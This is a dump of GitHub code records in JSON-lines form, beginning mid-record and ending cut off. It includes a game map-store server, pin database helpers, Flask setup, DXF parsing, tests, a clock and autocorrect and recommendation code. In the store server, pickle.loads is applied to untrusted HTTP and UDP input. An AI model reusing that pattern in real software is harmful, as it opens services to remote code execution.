out012.release()\n# cleanup the camera and close any open windows\nvs0.stop()\nvs1.stop()\nvs2.stop()\ncv2.destroyAllWindows()\n","repo_name":"duncanrpi/cameraTracking","sub_path":"pi/md4/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8031369799","text":"# Store saves map sections for fronts to be retrieved if necessary\n# Jarkko Kovala \n\nimport settings\n\nimport sys\nimport socket\nimport struct\nimport time\nimport threading\nimport random\nimport queue\nimport pickle\nimport urllib\nfrom urllib.parse import urlparse, parse_qs\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nsections = {} # The map sections\nsections_lock = threading.Lock()\n\nfronts = {} # The fronts\nfronts_lock = threading.Lock()\n\naddrport = 
settings.STORE_ADDRPORT\n\n# Attempt to send, generate packet loss for testing\ndef try_send(s, packet, addr):\n if(random.randint(1, 100) > settings.PACKET_LOSS):\n s.sendto(packet, addr)\n\n# Update an object\ndef update_object(section, version, obj_id, obj):\n section[\"version\"] = version\n\n if obj == None: # Object was removed\n print(\"Removing object\", obj_id, \"from section\", section[\"name\"], \"ver\", version)\n del section[\"objects\"][obj_id]\n else:\n print(\"Updating object\", obj_id, \"in section\", section[\"name\"], \"ver\", version)\n section[\"objects\"][obj_id] = obj\n\n# Clean internal data from map section for sending\ndef clean_section(section):\n section = section.copy()\n\n for x in (\"recv_buffer\", \"last_ack\", \"front\"):\n if x in section:\n del section[x]\n\n return section\n\n# HTTP request handler for store\nclass store_http_handler(BaseHTTPRequestHandler):\n def do_GET(self):\n protocol_version = \"HTTP/1.1\"\n\n query = urlparse(self.path)\n vars = parse_qs(query.query)\n\n if query.path == \"/map\": # Request to retrieve a map section\n section = int(vars[\"section\"][0])\n\n with sections_lock:\n if section in sections:\n print(\"Section\", section, \"requested, sending\")\n self.send_response(200)\n self.end_headers()\n self.wfile.write(pickle.dumps((clean_section(sections[section]), {})))\n else:\n print(\"Section\", section, \"requested but we don't have it\")\n self.send_response(404)\n self.end_headers()\n\n def do_POST(self):\n protocol_version = \"HTTP/1.1\"\n\n query = urlparse(self.path)\n content_len = int(self.headers.get('Content-Length'))\n if content_len > 0:\n body = self.rfile.read(content_len)\n\n if query.path == \"/map\": # Request to store a map section\n section_id, section, front_id, front = pickle.loads(body)\n\n print(\"Storing section\", section_id, \"for front\", front_id)\n\n with sections_lock, fronts_lock:\n sections[section_id] = section\n sections[section_id][\"front\"] = front_id\n sections[section_id][\"recv_buffer\"] = {}\n sections[section_id][\"last_ack\"] = section[\"version\"]\n fronts[front_id] = front\n \n self.send_response(200)\n self.end_headers()\n\n# UDP listener thread for store\ndef store_listener():\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.bind(settings.STORE_ADDRPORT)\n\n while True:\n data, addr = s.recvfrom(1024)\n\n if data[:6] == b\"UPDATE\": # Update for an object\n with sections_lock, fronts_lock:\n section, version, obj_id, obj = pickle.loads(data[6:])\n\n if fronts[sections[section][\"front\"]] == addr: # Check if it was the correct front\n # If we haven't received this then store in buffer\n if version > sections[section][\"last_ack\"] and version not in sections[section][\"recv_buffer\"]:\n sections[section][\"recv_buffer\"][version] = (obj_id, obj)\n\n # Acknowledge the update\n try_send(s, b\"ACK\" + struct.pack(\"!ll\", section, version), addr)\n \n # Process received updates consecutively\n while sections[section][\"last_ack\"] + 1 in sections[section][\"recv_buffer\"]:\n seq = sections[section][\"last_ack\"] + 1\n obj_id, obj = sections[section][\"recv_buffer\"].pop(seq)\n update_object(sections[section], seq, obj_id, obj)\n sections[section][\"last_ack\"] += 1\n\n# HTTP server thread for store \ndef store_http_server():\n httpd = HTTPServer(addrport, store_http_handler)\n\n try:\n print(\"Starting HTTP server at\", addrport)\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n\n httpd.server_close()\n\ndef main():\n # First store initial section data 
from settings\n for front in settings.INITIAL_SECTIONS_FOR_FRONTS:\n for section in settings.INITIAL_SECTIONS_FOR_FRONTS[front]:\n print(\"Adding initial section\", section)\n sections[section] = settings.INITIAL_SECTIONS_FOR_FRONTS[front][section]\n print(sections[section])\n\n store_http_server_thread = threading.Thread(target=store_http_server)\n store_http_server_thread.start()\n\n store_listener_thread = threading.Thread(target=store_listener)\n store_listener_thread.start()\n\n store_http_server_thread.join()\n store_listener_thread.join()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jarkkokovala/nss","sub_path":"design-assignment-game/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37527047564","text":"import random\nimport logging\n\nfrom mypinnings import database\nfrom mypinnings import media\n\n\nlogger = logging.getLogger('mypinnings.pin_utils')\n\n\nDIGITS_AND_LETTERS = 'abcdefghijklmnopqrstuvwxwzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n\n\nclass PinError(Exception):\n pass\n\n\ndef create_pin(db, user_id, title, description, link, tags, price, product_url,\n price_range, image_filename=None, board_id=None, repin=None):\n try:\n if image_filename:\n images_dict = media.store_image_from_filename(db, image_filename, widths=(202, 212))\n else:\n empty = {'url': None, 'width': None, 'height': None}\n images_dict = {0: empty, 202: empty, 212: empty}\n if not price:\n price = None\n external_id = _generate_external_id()\n pin_id = db.insert(tablename='pins',\n name=title,\n description=description,\n user_id=user_id,\n link=link,\n views=1,\n price=price,\n image_url=images_dict[0]['url'],\n image_width=images_dict[0]['width'],\n image_height=images_dict[0]['height'],\n image_202_url=images_dict[202]['url'],\n image_202_height=images_dict[202]['height'],\n image_212_url=images_dict[212]['url'],\n image_212_height=images_dict[212]['height'],\n product_url=product_url,\n price_range=price_range,\n external_id=external_id,\n board_id=board_id,\n repin=repin)\n if tags:\n tags = parse_tags(tags)\n values_to_insert = [{'pin_id':pin_id, 'tags':tag} for tag in tags]\n db.multiple_insert(tablename='tags', values=values_to_insert)\n pin = db.where(table='pins', id=pin_id)[0]\n return pin\n except:\n logger.error('Cannot insert a pin in the DB', exc_info=True)\n raise\n\n\ndef update_base_pin_information(db, pin_id, user_id, title, description, link, tags, price, product_url,\n price_range, board_id=None):\n if price == '':\n price = None\n db.update(tables='pins',\n where='id=$id and user_id=$user_id',\n vars={'id': pin_id, 'user_id': user_id},\n name=title,\n description=description,\n link=link,\n price=price,\n product_url=product_url,\n price_range=price_range,\n board_id=board_id,\n )\n db.delete(table='tags', where='pin_id=$pin_id', vars={'pin_id': pin_id})\n tags = parse_tags(tags)\n values_to_insert = [{'pin_id':pin_id, 'tags':tag} for tag in tags]\n db.multiple_insert(tablename='tags', values=values_to_insert)\n pin = db.where('pins', id=pin_id)[0]\n return pin\n\n\ndef update_pin_images(db, pin_id, user_id, image_filename):\n images_dict = media.store_image_from_filename(db, image_filename, widths=(202, 212))\n db.update(tables='pins',\n where='id=$id and user_id=$user_id',\n vars={'id': pin_id, 'user_id': user_id},\n image_url=images_dict[0]['url'],\n image_width=images_dict[0]['width'],\n image_height=images_dict[0]['height'],\n 
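# images_dict maps target width -> {'url', 'width', 'height'}; key 0 is\n              # the original upload, while 202/212 are the resized variants\n              # produced by media.store_image_from_filename (see create_pin).\n              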
image_202_url=images_dict[202]['url'],\n image_202_height=images_dict[202]['height'],\n image_212_url=images_dict[212]['url'],\n image_212_height=images_dict[212]['height'],\n )\n\n\ndef update_pin_image_urls(db, pin_id, user_id, image_url, image_width, image_height,\n image_202_url, image_202_height, image_212_url, image_212_height):\n db.update(tables='pins',\n where='id=$id and user_id=$user_id',\n vars={'id': pin_id, 'user_id': user_id},\n image_url=image_url,\n image_width=image_width,\n image_height=image_height,\n image_202_url=image_202_url,\n image_202_height=image_202_height,\n image_212_url=image_212_url,\n image_212_height=image_212_height,\n )\n\n\ndef delete_pin_from_db(db, pin_id, user_id):\n results = db.where(table='pins', id=pin_id, user_id=user_id)\n for _ in results:\n break\n else:\n # this pin does not belong to the user\n raise PinError('Item does not exist for you.')\n db.delete(table='likes', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='tags', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='pins_categories', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='comments', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='cool_pins', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='ratings', where='pin_id=$id', vars={'id': pin_id})\n db.update(tables='pins', where='repin=$id', vars={'id': pin_id}, repin=None)\n db.delete(table='pins', where='id=$id', vars={'id': pin_id})\n\n\ndef add_pin_to_categories(db, pin_id, category_id_list):\n if category_id_list:\n values_to_insert = []\n for category_id in category_id_list:\n values_to_insert.append({'pin_id': pin_id, 'category_id': category_id})\n db.multiple_insert(tablename='pins_categories', values=values_to_insert)\n\n\ndef remove_pin_from__all_categories(db, pin_id):\n db.delete(table='pins_categories', where='pin_id=$pin_id',\n vars={'pin_id': pin_id})\n\n\ndef update_pin_into_categories(db, pin_id, category_id_list):\n remove_pin_from__all_categories(db, pin_id)\n add_pin_to_categories(db, pin_id, category_id_list)\n\n\ndef parse_tags(value):\n parsed = []\n if value:\n separated = value.split('#')\n for v in separated:\n new_v = v.replace('#', '')\n new_v = new_v.strip()\n if new_v:\n parsed.append(new_v)\n return parsed\n\n\ndef add_hash_symbol_to_tags(value):\n if value:\n separated = value.split(' ')\n fixed = []\n for v in separated:\n if v.startswith('#'):\n fixed.append(v)\n else:\n new_v = '#{}'.format(v)\n fixed.append(new_v)\n return ' '.join(fixed)\n else:\n return value\n\n\ndef _generate_external_id():\n id = _new_external_id()\n while _already_exists(id):\n id = _new_external_id()\n return id\n\n\ndef _new_external_id():\n digits_and_letters = random.sample(DIGITS_AND_LETTERS, 9)\n return ''.join(digits_and_letters)\n\n\ndef _already_exists(id):\n db = database.get_db()\n results = db.where('pins', external_id=id)\n for _ in results:\n return True\n return False\n\n\ndef delete_all_pins_for_user(db, user_id):\n db.delete(table='likes', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='tags', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='pins_categories', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='comments', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='cool_pins', where='pin_id in (select id from pins where user_id=$id)', vars={'id': 
user_id})\n db.delete(table='ratings', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.update(tables='pins', where='repin in (select id from pins where user_id=$id)', vars={'id': user_id}, repin=None)\n db.delete(table='pins', where='id in (select id from pins where user_id=$id)', vars={'id': user_id})\n\n\nclass dotdict(dict):\n '''\n Special dict used for templates compatability\n '''\n def __getattr__(self, name):\n return self.get(name)\n","repo_name":"kissarat/pin","sub_path":"mypinnings/pin_utils.py","file_name":"pin_utils.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17188923438","text":"substrings = input().split(\", \")\r\nwords = input().split(', ')\r\n\r\nresult = [subst for word in words for subst in substrings if subst in word]\r\n\r\nprint(sorted(set(result), key=result.index))\r\n# for word in words:\r\n# for subst in substrings:\r\n# if subst in word and not subst in result:\r\n# result.append(subst)\r\n\r\n# for substrings[i] in any_strings[i]:\r\n# if substrings[i] == any_strings:\r\n","repo_name":"Mario97popov/Fundamentals","sub_path":"lab10Lise advanced exc/Ex1 Which are in.py","file_name":"Ex1 Which are in.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38427721509","text":"from typing import TYPE_CHECKING, Iterator, Iterable, List, Any, Union\nimport abc\nfrom itertools import islice\n\nfrom ezdxf.lldxf.tags import group_tags, Tags\nfrom ezdxf.lldxf.const import DXFKeyError, DXFStructureError\n\nif TYPE_CHECKING:\n from ezdxf.eztypes import TagWriter, Drawing\n\n\nclass AcDsEntity(abc.ABC):\n @abc.abstractmethod\n def export_dxf(self, tagwriter: \"TagWriter\"):\n ...\n\n @abc.abstractmethod\n def dxftype(self) -> str:\n ...\n\n\nclass AcDsDataSection:\n name = \"ACDSDATA\"\n\n def __init__(self, doc: \"Drawing\", entities: Iterable[Tags] = None):\n self.doc = doc\n self.entities: List[AcDsEntity] = []\n self.section_info = Tags()\n if entities is not None:\n self.load_tags(iter(entities))\n\n @property\n def is_valid(self):\n return len(self.section_info)\n\n def load_tags(self, entities: Iterator[Tags]) -> None:\n section_head = next(entities)\n if section_head[0] != (0, \"SECTION\") or section_head[1] != (\n 2,\n \"ACDSDATA\",\n ):\n raise DXFStructureError(\n \"Critical structure error in ACDSDATA section.\"\n )\n\n self.section_info = section_head\n for entity in entities:\n self.append(AcDsData(entity)) # tags have no subclasses\n\n def append(self, entity: \"AcDsData\") -> None:\n cls = ACDSDATA_TYPES.get(entity.dxftype(), AcDsData)\n data = cls(entity.tags)\n self.entities.append(data)\n\n def export_dxf(self, tagwriter: \"TagWriter\") -> None:\n if not self.is_valid:\n return\n tagwriter.write_tags(self.section_info)\n for entity in self.entities:\n entity.export_dxf(tagwriter)\n tagwriter.write_tag2(0, \"ENDSEC\")\n\n @property\n def acdsrecords(self) -> Iterable[\"AcDsRecord\"]:\n return (\n entity for entity in self.entities if isinstance(entity, AcDsRecord)\n )\n\n def get_acis_data(self, handle: str) -> List[bytes]:\n for record in self.acdsrecords:\n try:\n section = record.get_section(\"AcDbDs::ID\")\n except DXFKeyError: # not present\n continue\n asm_handle = section.get_first_value(320, None)\n if asm_handle == handle:\n try:\n asm_data = record.get_section(\"ASM_Data\")\n except DXFKeyError: # no 
data stored\n break\n return [tag.value for tag in asm_data if tag.code == 310]\n return []\n\n\nclass AcDsData(AcDsEntity):\n def __init__(self, tags: Tags):\n self.tags = tags\n\n def export_dxf(self, tagwriter: \"TagWriter\"):\n tagwriter.write_tags(self.tags)\n\n def dxftype(self) -> str:\n return self.tags[0].value\n\n\nclass Section(Tags):\n @property\n def name(self) -> str:\n return self[0].value\n\n @property\n def type(self) -> str:\n return self[1].value\n\n @property\n def data(self) -> Tags:\n return Tags(self[2:])\n\n\nclass AcDsRecord(AcDsEntity):\n def __init__(self, tags: Tags):\n self._dxftype = tags[0]\n self.flags = tags[1]\n self.sections = [\n Section(group)\n for group in group_tags(islice(tags, 2, None), splitcode=2)\n ]\n\n def dxftype(self) -> str:\n return \"ACDSRECORD\"\n\n def has_section(self, name: str) -> bool:\n return self.get_section(name, default=None) is not None\n\n def get_section(self, name: str, default: Any = DXFKeyError) -> Section:\n for section in self.sections:\n if section.name == name:\n return section\n if default is DXFKeyError:\n raise DXFKeyError(name)\n else:\n return default\n\n def __len__(self):\n return len(self.sections)\n\n def __getitem__(self, item) -> Section:\n return self.sections[item]\n\n def _write_header(self, tagwriter: \"TagWriter\") -> None:\n tagwriter.write_tags(Tags([self._dxftype, self.flags]))\n\n def export_dxf(self, tagwriter: \"TagWriter\") -> None:\n self._write_header(tagwriter)\n for section in self.sections:\n tagwriter.write_tags(section)\n\n\nACDSDATA_TYPES = {\n \"ACDSRECORD\": AcDsRecord,\n}\n","repo_name":"kevancress/MeasureIt_ARCH","sub_path":"libs/ezdxf/sections/acdsdata.py","file_name":"acdsdata.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"69945213227","text":"from flask import Flask, render_template, redirect, url_for, request, session, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager, login_manager\nfrom flask_moment import Moment\nfrom flask_babel import Babel\n\n# Base app creation\napp = Flask(__name__)\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\n\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'auth.signup'\nlogin_manager.login_message = u\" \"\n\nmoment = Moment(app)\n\nbabel = Babel(app)\n\n\n# Blueprints registration\nfrom app.dashboard.controllers import board\napp.register_blueprint(board)\n\nfrom app.auth.controllers import auth\napp.register_blueprint(auth)\n\n# Error handlers\n@app.errorhandler(404)\ndef page_not_fount(e):\n return render_template('/errorcodes/404.html'), 404\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('500.html'), 500\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = False\n\n# Babel locales\n@babel.localeselector\ndef get_locale():\n if not g.get('lang_code', None):\n g.lang_code = request.accept_languages.best_match(app.config['LANGUAGES'])\n return g.lang_code\n\n# Main routes\n@app.route('/')\ndef index():\n g.lang_code = request.accept_languages.best_match(app.config['LANGUAGES'])\n return redirect(url_for('dashboard.dashboard'))\n\n# GARBAGE\napp.jinja_env.add_extension('jinja2.ext.loopcontrols')\napp.jinja_env.globals['get_locale'] = 
get_locale\n\ndb.create_all()","repo_name":"jawdypus/Budget","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14597942339","text":"from simpleutil.log import log as logging\nfrom simpleutil.config import cfg\n\nfrom simpleservice.ormdb.api import MysqlDriver\n\nfrom goperation import lock\n\nfrom fluttercomic import common\n\nCONF = cfg.CONF\n\nDbDriver = None\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef init_endpoint_session():\n global DbDriver\n if DbDriver is None:\n with lock.get('mysql-%s' % common.NAME):\n if DbDriver is None:\n LOG.info(\"Try connect database for %s\" % common.NAME)\n mysql_driver = MysqlDriver(common.NAME, CONF[common.NAME])\n mysql_driver.start()\n DbDriver = mysql_driver\n else:\n LOG.warning(\"Do not call init_endpoint_session more then once\")\n\n\ndef endpoint_session(readonly=False):\n if DbDriver is None:\n init_endpoint_session()\n return DbDriver.get_session(read=readonly,\n autocommit=True,\n expire_on_commit=False)\n","repo_name":"lolizeppelin/fluttercomic","sub_path":"fluttercomic/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1322902628","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Tests for moondog \"\"\"\n\nfrom bagit import BagError\nimport logging\nfrom moondog.images import ImageBag\nfrom nose.tools import assert_equal, assert_false, assert_true, raises\nfrom os import makedirs\nfrom os.path import abspath, exists, join, realpath\nfrom shutil import rmtree\nimport sys\nfrom unittest import TestCase\n\nlogger = logging.getLogger(__name__)\ntest_data_path = abspath(realpath(join('tests', 'data')))\ntest_bag_path = join(test_data_path, 'foo')\ntest_original = 'IMG_4107.JPG'\ntest_original_path = join(test_bag_path, 'data', test_original)\ntest_master_path = join(test_bag_path, 'data', 'master.tif')\n\n\ndef setup_module():\n \"\"\"Change me\"\"\"\n pass\n\n\ndef teardown_module():\n \"\"\"Change me\"\"\"\n pass\n\n\nclass Test_Image_Basics(TestCase):\n\n def setUp(self):\n \"\"\"Change me\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def tearDown(self):\n \"\"\"Delete temporary items\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def test_image_construct(self):\n \"\"\"Test Image Construction\"\"\"\n im = ImageBag(test_bag_path, auto_make=True)\n assert_true(isinstance(im, ImageBag))\n del im\n\n @raises(OSError)\n def test_image_construct_exists(self):\n makedirs(test_bag_path)\n im = ImageBag(test_bag_path, auto_make=True)\n del im\n\n @raises(OSError)\n def test_image_construct_fail(self):\n \"\"\"Test Image Construction Failure (does not exist)\"\"\"\n im = ImageBag(test_bag_path) # default: auto_make=False\n del im\n\n\nclass Test_Image_Import(TestCase):\n\n def setUp(self):\n \"\"\"Change me\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def tearDown(self):\n \"\"\"Change me\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def test_import(self):\n im = ImageBag(test_bag_path, auto_make=True)\n im.accession(join(test_data_path, 'src', 'IMG_4107.JPG'))\n assert_true(exists(test_original_path))\n assert_true(exists(test_master_path))\n with open(join(test_bag_path, 'bag-info.txt'), 'r') as f:\n lines = [l[:-1] for l in f.readlines()]\n del f\n for line in lines:\n 
print(line)\r\n assert_true(lines[0].startswith(\"Bag-Software-Agent: bagit.py\"))\r\n assert_true(lines[1].startswith(\"Bagging-Date: \"))\r\n assert_equal(lines[2], \"Master-Filename: master.tif\")\r\n assert_true(lines[3].startswith(\"Original-Accession-Path:\"))\r\n assert_equal(lines[4], \"Original-Filename: IMG_4107.JPG\")\r\n assert_true(exists(join(test_data_path, 'src', 'IMG_4107.JPG')))\r\n\r\n","repo_name":"paregorios/moondog","sub_path":"tests/test_images.py","file_name":"test_images.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70779475629","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 3 13:29:40 2019\n\n@author: LHJ\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport math\nfrom skimage import io, transform\n#import cv2\n\nclass Datarange(object):\n \"\"\"\n A class used to scan a set of images for the maximum pixel intensity\n \"\"\"\n def __init__(self, \n data_in_path = '/media/zfq/My_Passport/SIM/Raw_data/ALL_data/microtubule/Training_Testing/HE_X2/',\n data_out_path= \"/media/zfq/My_Passport/SIM/Raw_data/ALL_data/microtubule/Training_Testing/HER/\",\n \n img_type=\"tif\"):\n \n file_name = os.listdir(data_in_path)\n self.sample_number = len(file_name) # the number of samples for training \n \n self.data_in_path = data_in_path\n self.data_out_path = data_out_path\n self.img_type = img_type\n \n self.train_data_dir = os.listdir(self.data_in_path)\n def maximum_intensity(self):\n sample_number = self.sample_number # the number of samples for training\n data_in_path = self.data_in_path\n data_out_path = self.data_out_path\n img_type = self.img_type \n max_in = 0\n max_out = 0\n for sample_num in range(sample_number):\n filepath = os.path.join(data_in_path, self.train_data_dir[sample_num]) \n image_name = os.path.join(filepath, \"HE_00.\" + img_type)\n image = io.imread(image_name)\n m_in = image.flatten().max()\n if m_in > max_in:\n max_in = m_in \n \n for sample_num in range(sample_number):\n filepath = os.path.join(data_out_path, self.train_data_dir[sample_num]) \n image = io.imread(filepath+\".\"+img_type)\n m_out = image.flatten().max()\n if m_out > max_out:\n max_out = m_out \n \n max_intenty_value = {'max_in': max_in,'max_out':max_out}\n return max_intenty_value\n\nif __name__ == \"__main__\":\n mydata = Datarange()\n intensity_v = mydata.maximum_intensity()\n print(intensity_v['max_in'])\n print(intensity_v['max_out'])\n","repo_name":"drbeiliu/DeepLearning","sub_path":"Data_preprocessing/datarange.py","file_name":"datarange.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"35956068741","text":"#destined for parameters.py\ndef Parameters():\n    # run variable parameters\n    money_values = [False] #[True, False]\n    numeraire_values = ['wage'] #['wage', 'money']\n\n    # firm variable parameters\n    gamma_values = [.7]\n    zeta_0_values = [.55] #price elasticity of demand for rice in the US (2008).\n    z_error_values = [.7]\n    inertia_values = [.5] #[x / 10 for x in range(11)]\n    eta_0_values = [1]\n    x_error_values = [.3]\n    mF_0_values = [0]\n    expiration_values = [1] #percentage of stock which expires each timestep\n\n    #household variable parameters\n    Lmax_values = [400] \n    alpha_values = [.2] \n    beta_values = [.8] \n    mH_0_values = [0]\n    saving_values = [0]\n    \n    param_names = ['money', 'numeraire', \n                   'gamma', 'zeta_0', 'z_error', 'inertia', 'eta_0', 'x_error', 'mF_0', 'expiration',\n                   'Lmax', 
'alpha', 'beta', 'mH_0', 'saving']\n\n param_lists = [[m, n, g, z, ze, i, e, xe, mf, ex, l, a, b, mh, s] for m in money_values for n in numeraire_values for g in gamma_values for z in zeta_0_values\n for ze in z_error_values for i in inertia_values for e in eta_0_values for xe in x_error_values\n for mf in mF_0_values for ex in expiration_values for l in Lmax_values for a in alpha_values for b in beta_values for mh in mH_0_values for s in saving_values]\n\n param_sets = [dict(zip(param_names, p)) for p in param_lists]\n runs = len(param_lists)\n print('This session is', runs, 'runs.')\n \n return(param_sets)","repo_name":"asuberlin/price_wage_dynamics","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28808160385","text":"from tkinter import *\nimport time\n\nikkuna = Tk()\nikkuna.resizable(False,False)\nikkuna.title(\"Kello\")\n\naika = time.strftime(\"%d.%m.%Y %H:%M:%S\")\nlast = time.time()\n\ntextColors = ['black', 'blue', 'yellow', 'green', 'red', 'white']\nbackgroundColors = ['white', 'yellow', 'blue', 'red', 'green', 'black']\ncolor = 0\n\nkello = Label(ikkuna, text=aika, font=('Comic Sans MS', 20), width=30)\nkello.grid(row=0, column=0)\n\nwhile True:\n if (time.time() > last+1):\n aika = time.strftime(\"%d.%m.%Y %H:%M:%S\")\n color = color+1 if (color 0:\n print('Original number of words: {}'\n .format(len(self.nlp_data)))\n self.nlp_data = {k: v for k, v in self.nlp_data.items()\n if v >= threshold}\n print('After applying threshold: {}'\n .format(len(self.nlp_data)))\n\n def existing(self, words):\n \"\"\"{'the', 'teh'} => {'the'}\"\"\"\n return set(word for word in words\n if word in self.nlp_data)\n\n def autocorrect_word(self, word):\n \"\"\"most likely correction for everything up to a double typo\"\"\"\n def get_candidates(word):\n w = Word(word, self.lang)\n candidates = (self.existing([word]) or\n self.existing(w.typos()) or\n self.existing(w.double_typos()) or\n [word])\n return [(self.nlp_data.get(c, 0), c) for c in candidates]\n\n candidates = get_candidates(word)\n\n # in case the word is capitalized\n if word[0].isupper():\n decapitalized = word[0].lower() + word[1:]\n candidates += get_candidates(decapitalized)\n\n best_word = max(candidates)[1]\n\n if word[0].isupper():\n best_word = best_word[0].upper() + best_word[1:]\n return best_word\n\n def autocorrect_sentence(self, sentence):\n return re.sub(word_regexes[self.lang],\n lambda match: self.autocorrect_word(match.group(0)),\n sentence)\n\n __call__ = autocorrect_sentence\n\n\n# for backward compatibility\nclass LazySpeller:\n def __init__(self):\n self.speller = None\n\n def __call__(self, sentence):\n print('autocorrect.spell is deprecated, \\\n use autocorrect.Speller instead')\n if self.speller is None:\n self.speller = Speller()\n return self.speller(sentence)\n\n\nspell = LazySpeller()\n","repo_name":"EanNewton/FamBot","sub_path":"speller/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33321945419","text":"from math import sqrt\n\n# Returns a distance-based similarity score for person1 and person2\ndef sim_distance(prefs,person1,person2):\n # Get the list of shared_items\n si={}\n for item in prefs[person1]:\n \tif item in prefs[person2]:\n \t\tsi[item]=1\n\n # if they have no ratings in common, return 0\n if 
len(si)==0:\n \treturn 0\n\n # Add up the squares of all the differences\n sum_of_squares=sum( [pow( prefs[person1][item] - prefs[person2][item] , 2 ) for item in prefs[person1] if item in prefs[person2]] ) \n\n return 1/(1+sum_of_squares)\n\n\n\ndef sim_pearson(prefs,p1,p2):\n\t # Get the list of mutually rated items\n\n\tsi={}\n\n\n\tfor item in prefs[p1]:\n\t\tif item in prefs[p2]:\n\t\t\tsi[item]=1\n\n\n\t# Find the number of elements\n\tn = len(si)\n\n\n\t# if they are no ratings in common, return 0\n\tif n==0:\n\t\treturn 0\n\n\n\t# Add up all the preferences\n\tsum1=sum([prefs[p1][it] for it in si])\n\n\tsum2=sum([prefs[p2][it] for it in si])\n\n\n\t# Sum up the squares\n\tsum1Sq=sum([pow(prefs[p1][it],2) for it in si])\n\n\tsum2Sq=sum([pow(prefs[p2][it],2) for it in si])\n\n\n\t# Sum up the products\n\tpSum=sum([prefs[p1][it]*prefs[p2][it] for it in si])\n\n\t# Calculate Pearson score\n\tnum=pSum-(sum1*sum2/n)\n\n\tden=sqrt((sum1Sq-pow(sum1,2)/n)*(sum2Sq-pow(sum2,2)/n))\n\n\tif den==0:\n\t\treturn 0\n\n\tr=num/den\n\n\treturn r\n\n\n\ndef topMatches(prefs, person, n=5, similarity=sim_pearson):\n\n\t#The LOC below runs the specified Algorithm , in our case SIM_PEARSON if the PERSON provided at Function Call is not the same person being compared to at Algorithm Running\n\t#Then it stores it in a List called Scores and since the Algorithms returns only a score, we put a comma ',' and include the Owners of the Rating Name i.e 'other' beside it\n\t#i.e 0.99, 'Lisa Rose'\n\n\tscores=[ ( similarity(prefs,person,other), other ) for other in prefs if other!=person ]\n\n # Sort the list so the highest scores appear at the top\n\tscores.sort( )\n\n # Optionally We Revert the List So the Highest Scores are in front\n\tscores.reverse( )\n\n#Lastly we return the N Numbers of Highest Scores i.e Similarity\n\treturn scores[0:n]\n\n\ndef getRecommendations(prefs,person,similarity=sim_pearson):\n \n totals={}\n\n simSums={}\n \n\n\n\n\n\n\n for other in prefs:\n # don't compare me to myself\n \tif other==person:\n \t\tcontinue\n \t\n \tsim=similarity(prefs,person,other)\n\n \tif sim <= 0:\n \t\tcontinue\n\n\n \tfor item in prefs[other]:\n\t # only score movies I haven't seen yet\n\t \tif item not in prefs[person] or prefs[person][item]==0:\n\n\t\t #Total of all (Similarity * Score)\n\t\t \ttotals.setdefault(item,0)\n\t\t \n\t\t \ttotals[item]+=prefs[other][item]*sim\n\t\t \n\t\t # Sum of similarities\n\t\t \tsimSums.setdefault(item,0)\n\t\t \n\t\t \tsimSums[item]+=sim\n \n # Create the normalized list\n 